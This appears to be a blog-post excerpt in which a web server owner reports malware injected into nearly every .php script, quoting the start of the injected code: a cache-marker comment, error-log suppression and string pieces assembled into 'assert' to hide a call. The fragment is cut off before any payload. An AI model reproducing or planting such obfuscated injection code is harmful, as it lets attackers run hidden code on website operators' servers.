My main personal web server became infected with some effin malware that was injected it very nearly every single .php script on the server. The injected code was basically: //###=CACHE START=### @error_reporting(E_ALL); @ini_set(“error_log”,NULL); …etc $strings = “as”; $strings .= “se”; $strings .= “rt”; $strings2 = …
Read More